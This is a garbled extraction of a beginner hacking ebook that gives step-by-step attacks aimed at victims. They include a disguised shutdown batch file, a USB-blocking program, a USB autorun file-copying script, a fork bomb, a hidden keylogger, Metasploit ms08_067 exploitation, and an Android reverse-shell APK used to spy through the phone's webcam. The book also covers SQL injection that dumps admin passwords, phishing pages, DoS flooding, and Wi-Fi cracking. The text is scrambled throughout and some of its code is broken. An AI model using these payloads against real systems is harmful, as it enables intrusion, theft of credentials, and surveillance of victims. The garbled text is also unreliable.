A Hacker's Life Starter - Benjamin James
A Hacker's Life Starter - Benjamin James
A Hacker's Life Starter - Benjamin James
Acknowledgments
About the Author
Introduction
To who is this book aiming?
How to use the book
Chapter 1 Defining a Hacker
Who are hackers
What motivates hackers
Becoming a hacker
Dont ever go against the rules
computer
Keylogger
How it works
Small summery ahead
Chapter 3 Creating virus
Building your first virus file
Creating a virus to disable USB
ports
Setting up Borland C++
Creating the C file that blocks usb
ports
Creating virus that unblocks the
USB ports.
Virus nested in the stick
administrator
password
Chapter 5
Backtrack
In Depth with
History of backtrack
Installing backtrack
Metasploit using backtrack
Metasploit Terms
Peforming
Metasploit
Penetrate Users in LAN
to
&
.zip
using
Crack
Wi-Fi
Windows
passwords
in
Defending
yourself
against
from
DoS
Dedication
This is book is
dedicated to my
beloved
grandma
and mother who
taught me to never
give up in any
circumstances. And
for making me the
great man that Im
now.
Acknowledgments
To make it clear I
would like to give a
warm gratitude to
knew
everything
about
network
security that gave me
the
enough
information.
My
editor
that
polished the book
for me, without him
this book would
have not existed at
all.
Benjamin
James
has an IT degree and
worked as a software
developer
at
a
company for years.
Also he helped
many people with
security
problems
and their computers.
He knows how to
Introduction
Awesome
for
choosing A Hackers
the
information
around the world
for
these
past
months to put them
inside this book.
Im not saying that there is no information
out there on the internet or in other books,
but what Im saying is that in this book I
wont let you waste your precious time
reading, but only gain from it.
Chapter 1
Hacker
Defining
We will cover :
* Who are hackers
* What motivates hackers
* Becoming a hacker
* Dont ever go against the
rules
network. Anything
that has to do with
storing digital bulk
of
information.
There
are
two
hackers white hat
(good side) and
black hat (bad side).
Hackers
are
advanced
programmers who
have
great
knowledge on both
hardware
and
software. In the past
Hackers
where
computer users who
wanted to explore
the
world
of
computer more indepth
.
But
nowadays hackers
are called people
who crack inside
someone
else's
personal system and
gain
information
(criminal hackers),
reasons why could
be endless.
Black Hat
A black hat is a person that tries to
exploit computer personal financial gain
or other malicious reasons. Mostly with
bad intentions and to achieve something
wrong. Mostly called crackers.
Becoming a hacker
Tools
We will cover :
* Backtrack
* Wireshark
* Vadilia Tor
* Getting familiar with viruses
* Keylogger
Backtrack
In this book we will use Backtrack as
much as we can because it offers numbers
of methods for cracking inside a system
with ease. Backtrack is an open source
operating system that can be booted from
a live CD or USB with no requiring for
installation. Also, permanent installation
to the network or HDD is easy
achievable. In chapter 5 we will cover
BackTrack's
organized
tools
into
are
12
categories:
*
Information
Gathering
*
Vulnerability
Assessment
*
Exploitation
Tools
*
Privilege
Escalation
*
Maintaining
Access
*
Reverse
Engineering
* RFID Tools
* Stress testing
* Forensics
* Reporting Tools
* Services
* Miscellaneous
In Figure 2-1
Wireshark
Wireshark is another tool used to sniff
WIFI/online account passwords and
packets out there. Basically what it does
it captures packets from connections
How it works
Vadilia TOR
Tor is the worlds largest anonymity free
How it works
Getting
viruses
familiar
with
Top
5
computer
History
destructive
viruses
in
* Melissa
* MYDoom
* Storm
* ILOVEYOU
* Code Red
Keylogger
Knowing how to
work
with
a
keylogger is also
useful
especially
when you will need
to monitor users
passwords. Basically
key loggers are used
in IT organization to
find
technical
problems. But there
are those who uses it
for sniffing users
passwords
and
others.
How it works
The word say it for itself, it logs
keyboard keystrokes into a file , so it can
be later found out later. Most key-logger
store the data inside local hard drive. But
there are some that sends in through the
internet or the network remotely(see
Figure 2-4).
hacking.
* Tor cloaks your ip and with that it
makes it difficult that they can find the
real ip
* Keylogger is used to monitor what the
user is typing on his keyboard.
Share on Facebook
this Guide
Tweet
end
you
will
understand how to
make one and how it
operates.
1.
Start by opening notepad for the
texting
.Start->All
Programs>Accessories->Notepad
2. Type this piece of code in notepad:
@echo off
echo Message here.
shutdown -s -f -t 60 -c "type a message
you want to appear here
3.
Save the file as play this 3D
game.bat, change the Save file type:
when saving to All Files. And then
save. (see Figure 3-1)
4.
1.
First off you need to download
Borland C++ 5.5 or above.
2.
After you install Borland C++
compiler, create two new Text
Documents in Notepad.
3.
Type this in the first txt file these
first two lines:
-Ic:\Borland\Bcc55\include
-Lc:\Borland\Bcc55\lib
4.
Save changes and close the file.
Now rename the first file to bcc32.cfg.
7.
Put the two files in this directory:
C:\Borland\BCC55\Bin
#include<stdio.h>
void main()
{
system("reg
add
HKEY_LOCAL_MACHINE\\SYSTEM\\Cur
\/v Start \/t REG_DWORD \/d 4 \/f");
2.
Place
C:\Borland\BCC55\Bin
the
file
in
3.
Now open command prompt(Start>Run->type cmd)
4.
Type in:
cd C:\Borland\BCC55\Bin
5. Now compile the file by typing:
bcc32 block_usb.c
Creating
virus
that
unblocks the USB ports.
Now that your done you should have an
block_usb.exe file in the folder that
hopefully blocks all the USB ports.
1. To enable all the USB ports back
again you should replace this code in the
block_usb.c file and compile again:
#include<stdio.h>
void main()
{
system("reg
add
HKEY_LOCAL_MACHINE\\SYSTEM\\Cu
\/v Start \/t REG_DWORD \/d 3 \/f");}
3.
Ok thats it, save the file with a .inf
extention
4. Choose an appealing icon for the file
and thats it.
5. Create another text file and in it and
type this:
@echo off
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd%
"%USERPROFILE%\pictures"
"%drive%\backup\My pics"
%backupcmd%
"%USERPROFILE%\Favorites"
"%drive%\ backup \Favorites"
%backupcmd%
"%USERPROFILE%\videos" "%drive%\
backup \vids"
@echo off
cls
6.
When youre done save it as
something but give it the extension .bat
7.
We are almost done. Open another
empty text file and type this:
CreateObject("Wscript.Shell").Run """"
&
WScript.Arguments(0) & """", 0, False
12.
Now it should be done. Pull out
the stick from the computer and insert it
again and the autoplay window should
Getting
Trojan
started
with
* Delete Data
* Blocking Data
* Modifying Data
* Copying Data
* Disrupting the performance
computers or computer networks
Trojan backdoor
of
it in virtual box.
2. Make sure you dont have an antivirus
in the virtual box operating system. Now
your antivirus should detect this bat file.
If not this could fill the users memory.
@echo off
A
Start
Start
Start
Start
Start
Start
Start
goto a
Share on Facebook
this Guide
Tweet
C hapter4
passwords
Cracking
We will cover:
* Types of passwords
* Basic administrator password reset.
* Crack the encrypted pdf
* Bypass windows password
* Custom made keylogger
Password
Types of passwords
Dictionary- A file of words is run against
user accounts, and if the password is a
simple word, it can be found pretty
quickly.
Hybrid - A common method utilized by
users to change passwords is to add a
number or symbol to the end. A hybrid
attack works like a dictionary attack, but
adds simple numbers or symbols to the
password attempt.
Brute force - The most time-consuming,
but comprehensive way to crack a
password.
Every combination of
character is tried until the password is
broken.
Basic
administrator
password reset
1.
Go to Start->open Run-> then write
cmd. Or Start->And search for command
prompt then enter.
2.
To view the available user see
Figure 4-1)inside the operating system
type in:
net user
3. Now type :
net user Administrator *
you write net user again and the
administrator account this time its
Administrator
4. After then type in the new password
twice. After then it should be okay for you
to enter the administrator account with the
new password.
1.
When you download and install APDF Restrictions Remover, you should be
able to right click the restricted pdf file
and choose Remove Restrictions or
Remove Restriction & Save as..
Bypass
Password
windows
1.
Go to this link:
http://ophcrack.sourceforge.net/download.p
and download ophcrack LiveCD-> Burn
the iso.
2.
4.
Now launch the IDLE(Python GUI)
by searching the name in
start and the python shell will launch
itself.
5. Type in those python code inside the
app:
import win32api
import win32console
import win32gui
import pythoncom, pyHook
win
win32console.GetConsoleWindow()
win32gui.ShowWindows(win,0)
def OnKeyboardEvent(event):
if event.Ascii==5:
_exit(1)
if event.Ascii != 0 or 8:
f=open(c:\output.txt,w)
buffer=f.read()
f.close()
f=open(c:\output.txt,w)
keylogs=chr(event.Ascii)
if event.Ascii==13:
keylogs=/n
buffer += keylogs
f.write(buffer)
f.close()
hm = pyHook.HookManager()
hm.KeyDown = OnKeyboardEvent
hm.HookKeyboard()
pythoncom.PumpMessages()
6.
Save the file
my_own_keylogger.py and launch it
as
7.
Now that your made-software is
running, you can start testing it by going to
History of backtrack
Backtrack was originated from two
Installing backtrack
Backtrack is an operating system that can
either be running from a Live CD or it
startx
4. And hit Enter. To open the graphical
user interface operating system.
7 . Fill in the
bit login:
Root
8 . Fill in the
password:
toor
9 . And to start
backtrack to the
desktop write:
startx
Metasploit
backtrack
using
Metasploit Terms
Vulnerability Information
Disclosure (A weakness inside the
system)
Peforming Metasploit to
Penetrate Users in LAN
/pentest/exploits/framework3
cd /pentest/exploits/framework2.
2.
Once your inside that directory you
type in :
svn update
3.
In Figure 5-3.shows
you the Armitage
dialog ready to start
connecting
4.
Once it is
open change DB
Driver option to
postgresql. Let
the DB Connect
String the same
5.
Now go to
Host->Nmap
Scan->Quick
Scan(OS derect)
Here you can
scan or import
host in your
network using
Nmap.
(see
Figure 5-5)
6.
Enter the Ip range you think that the
user might be in for example from 30 to
40. And Ok.
7.
When its finished a message will
come up saying Scan is complete. Click
Ok.
.
8.
And then you will see all the
available host computers here. You can
organize them by right clicking gray area
and Layout->Stack.
9.
Now go to: Attacks->Find Attacks>by port
Attack->smb->ms08_067_netapi
12.
To take screenshot of the host
computer, right click on the icon and;
Meterpreter 1->Explore->Screenshot.
And there you have it.
13. And to Explore inside the victims
computer.. Meterpreter 1->Explore>Browse Files.
2.
To Make sure if you have gedit
(gedit is a text editor) installed on your
backtrack.
Type in:
gedit.
(If its not installed type in:
install gedit)
apt-get
3.
Once gedit is open save it as an
empty file named passwd.list inside the
4.
Type in:
dhclient eth0
password.
6.
If you would like to test if it works,
type in terminal: firefox . That will lunch
firefox.
7.
In the url navigator type in:
http://[your_router_ip]/
Fill in the username and password. And
you found and Hualaa! Youre in. (see
Figure 5-6)
desktop.
1.
to
-2 modulo r/m
Here are how the chart works:
-b > bruteforce
-c a > charset lower case alphabets
-l 1-6 > length of expected password
fcrackzip
-b
-c
a
/root/Desktop/crack me.zip
-l
1-6
1.
Run Backtrack to the Desktop and
run the terminal.
2.
Type in:
gedit
3. And type this in gedit and when your
finished save as hacker
#!/bin/bash
Backtrack
was
revolutionized to Kali
Backtrack 6 was never going to come out
and have new features. But apparently the
same coders and people who created
backtrack re-created backtrack with new
features and named it Kali. Still many
people gave it many other names for it
like: Backtrack six, Reborn of
Key features
Everything is the same as backtrack so it
will be very easy for you to get used to it.
The only deference is that it has more
tools and features like:
* Kali now supports much more chipsets
for wireless devices compared to
backtrack 5.
Hack in Smartphones
msfpayload
android/meterpreter/reverse_tcp
lhost=192.168.2.17 lport= 8080 R >
/root/Desktop/files.apk
msfconsole
exploit
5.
Ok now we are ready. Now youll
have to figure a way to have the victim
download file.apk to shes/his phone or
tablet. Just find a free web host or share it
in your dropbox. Ill just leave it to your
imagination.
6.
Now once its downloaded and
opened in the phone you can start playing
in his/shes phone. We will first of list
the files in the phone by typing:
ls
ps
8.
And now lets take some pictures
from the cam by typing :
webcam_snap 1
In
Figure
5-8
.shows you how the
script is running in
the terminal.
Share on Facebook
this Guide
Tweet
C hap t e r6
Hacking
We will cover:
History of SQL injection
Understanding SQL injection
Simple SQL-injection
Introduction to Phishing
Website
Performing Phishing
Sometimes
Understanding
injection
SQL-
Simple SQL-injection
SQL injection can be
used in forms of
contact,
feedback
fields,
shopping
cards and many
more. Most of the
fields allow for SQL
commands.
But
nowadays its really
difficult to do an
SQL injection in
some site because
most of them come
really tight protected
from SQL-injection.
Doing a SQL-injection
2.
http://www.testing_site.com/index.php?
id=2'
http://www.testing_site.com/index.php?
id=2 order by 1
http://www.testing_site.com/index.php?
id=2 order by 2
http://www.testing_site.com/index.php?
id=2 order by 3
http://www.testing_site.com/index.php?
id=2 order by 4
http://www.testing_site.com/index.php?
id=2 order by 1-http://www.testing_site.com/index.php?
id=2 order by 2-http://www.testing_site.com/index.php?
id=2 order by 3-http://www.testing_site.com/index.php?
id=2 order by 4--
http://www.testing_site.com/index.php?
id=2 order by 5--
http://www.testing_site.com/index.php?
id=-2 union select 1,2,3,4,5,6,7
http://www.testing_site.com/index.php?
id=-2
and
1=2
union
select
1,2,version(),4,5,6,7
This should display the version at 5.0.1
or 4.3
http://www.testing_site.com/index.php?
id=-2
and
1=2
union
select
1,2,database(),4,5,6,7
If nothing happens or It went wrong try
this one:
http://www.testing_site.com/index.php?
id=-2
and
1=2
union
select
1,2,unhex(hex(@@version)),4,5,6,7
10.
Now with this it will show you a
list of table of names. Its up to you to
find the table name witch is related with
the user or admin.
11.
Now you need to replace the
group_concat(table_name)
with
the
group_concat(column_name)
12.
Also replace from
information_schema.tables
table_schema=database()--" with "FROM
information_schema.columns
table_name=mysqlchar--
WHERE
13.
It would be great if you could
install the HackBar addon right now(see
Figure 6-1)
14.
We go to sql->Mysql>MysqlChar() inside the hackbar.
http://www.testing_site.com/index.php?
id=-2
and
1=2
union
select
1,2,group_concat(column_name),4,5,6,7
from information_schema.columns where
table_name=CHAR(97, 100, 109, 105,
110)
15.
Now you are supposed to see the
list of column.
For example:
example: admin,password,admin_id,admin
s,admin_id,admin_name,admin_password,I
16.
And next, replace the the replace
group_concat(column_name)
with
group_concat(columnname1,0x3a,anotherco
17.
Now replace the " from
information_schema.columns
where
table_name=CHAR(97, 100, 109, 105,
110)" with the "from table_name"
For example:
http://www.testing_site.com/index.php?
id=-2
and
1=2
union
select
1,2,group_concat(admin_id,0x3a,admin_p
from admin
18.
Its supposed to show the data
stored in the database. Depends on the
column name .If all of these query gives
an error message then try some other
columns name from the list.
19.
Now its time to try with one of
these url link for finding the url link.
http://www.testing_site.com/admin.php
http://www.testing_site.com/admin/
http://www.testing_site.com/admin.html
http://www.testing_site.com:2082/
After then with few tries with failures,
you will wind up inside the administrator
page using these urls examples.
Introduction to Phishing
Whaling
This type of phishing is specifically
directed to many high ranking person
inside the business or the organization.
Spear phishing
This one is focused on any people who
have some connection with the
organization
Performing Phishing
2.
Search for the code line inside
source code
3. Make some changes inside the code
4. Create a free hosting account , Most
of the times your account gets suspended
cause its against the rules to have a
phishing site online
5.
Upload the fake Login Page you
created on the hosting site.
Phishing:
1.
First run Backtrack to the desktop
and run the terminal.
2. To read your ip address Type:
ifconfig
cd /pentest/exploits/set
./set
5.
Select 1 for Social-Engineering
Attacks
6.
Now we choose 2 to select the
Website Attack Vectors.
7.
We now select 4 for Tabnabbing
Attack Method.
10.
In this step you will have to enter
the name of the site you want to make a
phishing page. It could be again ANY
social network site or email site for
example:
http://www.ffthesocialnetwork_or_emailsi
11.
After a few moment of waiting it
asks to press Return, So do it afterwards
press Enter (see Figure 6-3)
12.
Now what actually happened is
that your ip address has turned into your
phishing page link.
13.
The next step is make your IP
shorter to do so we go to http://goo.gl/
and paste our link and click on Shorten
Url. (see Figure 6-4)
14.
And there you have it test the link
if it works. Now you need to either email
the link or message the link to a friend
that can handle this prank or yourself for
educational purposes.
15.
Now when the ID and the
Password is entered youll receive the
email and password in your terminal. (So
leave the terminal open and dont restart
the PC until its in otherwise the ip might
change).
Dear Customer
Share on Facebook
this Guide
Tweet
Chapter 7 Denial
Service in Depth
of
We will cover:
* What is Denial of Sercice
* How DoS works
* Building a DoS attack
* DoS on the DNS
Have
A lot of people
might be thinking
that DDoS is about
cracking the security
or to change private
information.
For
example, an Email
Denial of Service
attack its not about
hacking the user
email but to prevent
him from checking,
receiving or sending
the mails. It works
like you already
might
probably
already guessed by
sending mass and
mass of request
continuously.
And with this the
service/server
becomes either slow
or crashes. Whats
happening really is
Limitations of DoS
In these days the
services are really
Sometimes
even
when the DDos
manages to put the
service/server down.
It goes back up after
a few moments.
Another one if you
only got one attacker
attacking a website
and that website has
so many traffic on it.
It would be almost
impossible because
* Web servers
* Email servers
* DNS servers
Also connection that dont have limit . To
find out that it has no limit send package
to see how much it can hold. Send a lot of
email attachments into their system. And,
lets say you dont have a specific target
you can just flood it like we would do,
but it takes more flooding and more
connection to do it.
5.
Also change the method field to
TCP. And click on IMMA CHARGIN
MAH LAZER to mount the attack, quickly
the Requested will start increasing fast.
DoS On a DNS
5.
Dont close the command prompts
and leave them working for an hour or
even more (The bigger the site the more
time it takes). While command prompts
are running keep refreshing the site to see
if it's still up and eventually after a few
moments it will be down.
A tip to make sure the site goes down
and faster is to do this trick of opening
many command prompt on multiple
computers. The more computer you have
better.
Share on Facebook
this Guide
Tweet
We will cover:
* How security wifi is encrypted
* Tools to crack a wifi
* Cracking WEP wireless password
*
Cracking
WPA/WPA2
wireless
password
* Cracking wifi password in windows
* Bypassing MAC Address filter
How security
encrypted
wifi
is
The tools
* Backtrack
* Airmon-ng
*Commview
*Compatible wifi card
1.
First run backtrack to desktop and
open the terminal.
2. To get a list of the network interfaces
type in(see Figure 8-1):
airmon-ng
type:
airmon-ng start wlan0
5. Now to find the networks in area and
pick it we will be using airodump-ng
(interface) . So I type :
airodump-ng mon0
6.
aireplay-ng
-2
p
FF:FF:FF:FF:FF:FF
00:05:5D:EC:AA:52 mon0
0841
c
b
Aircrack-ng wep*.cap
Cracking
WPA/WPA2
Wireless Pass
1.
Open backtrack to the deskop and
run two terminals
2.
airmon-ng
And the interface will come up.
3.
So type in :
apt-get update
6.
And now we install reaver by
typing :
1.
First download commview for free
trial
version
at
http://www.tamos.com/download/main/ca.
It can also be bought at from site itself.
This is a tool for monitor wireless.
2. Once its done , lunch commview(see
Figure 8-5) and go in the note Tab
9.
Now we go to www.aircrackng.org/install.html and click on Precompiled and from there download
Aircrack-ng GUI.exe(see Figure 8-8)
Now type :
4.
Now we will search some packets
from the wifi. We will use airodump-ng
c [channel] a --bssid [bssid] mon0.
That means I would type:
airodump-ng c
9 a
98:FC:11:69:E6:07 mon0
--bssid
5.
Now we wait for the terminal to
work until we get some packets under the
STATION (see Figure 8-11)
6.
Once you found the mac address
under the station copy it. Mine is
00:12:3E:78:3F:7F
7.
Now we are taking the interface
down by typing:
Ifconfig wlan0 up
00:12:3E:78:3F:7F
8.
Now lunch the wireless manager by
going start->internet->Wicd Network
Manager
9. Disconnect all, give it a refresh and
connect to the wifi you by passed its filer
and it should work
Sometimes if you by pass the mac filter
you might lose the internet. It might be
because they found out that you spoofed
inside the network and they kicked you
out.
the
strongest
Share on Facebook
this Guide
Tweet
C hapter9
from Hackers
Defending
We will cover:
*Protect yourself against Dos attacks
*Best tool to remove the virus
*Securing your operating system
*Securing your wireless
* HideMyAss
1. Go to malwarebytes.org/downloads/
and download it for free(see Figure 9-2)
4.
Once you installed it launch it.
Choose for Peform Quick Scan and then
click Scan.To test the software power
.Maybe before you even click on scan
Malwarebytes
already started
quarantine few malicious threads .
to
3.
Another great tool to completely
protect yourself is the use of avast safe
zone. First of download or buy the full
version of Avast. And when you installed
it go to the SECURITY TAB->Tools
Section->SafeZone and click on Switch to
SafeZone (see Figure 9-5)
Ipconfig /all
2.
From there locate the line that is
labeled Gateway
3. With that Gateway IP you will paste
it in your favorite web browser address
bar.
4.
If your using the Linksys go in the
wireless security tab and change the
Security Mode to WPA or WPA2
5.
Also
disable
the
Share on Facebook
this Guide
Tweet
Paperback link
Table of Contents
Chapter 1 Defining a Hacker
Dedication. 4
Acknowledgments. 8
About the Author. 21
Introduction. 38
To who is this book aiming?. 54
How to use the book. 80
Chapter 1 Defining a Hacker. 99
Who are hackers. 124
What motivates hackers. 133
Becoming a hacker. 159
Dont ever go against the rules. 182
Small summery ahead. 204
Chapter 2 The Hackers Tools. 221
Backtrack. 239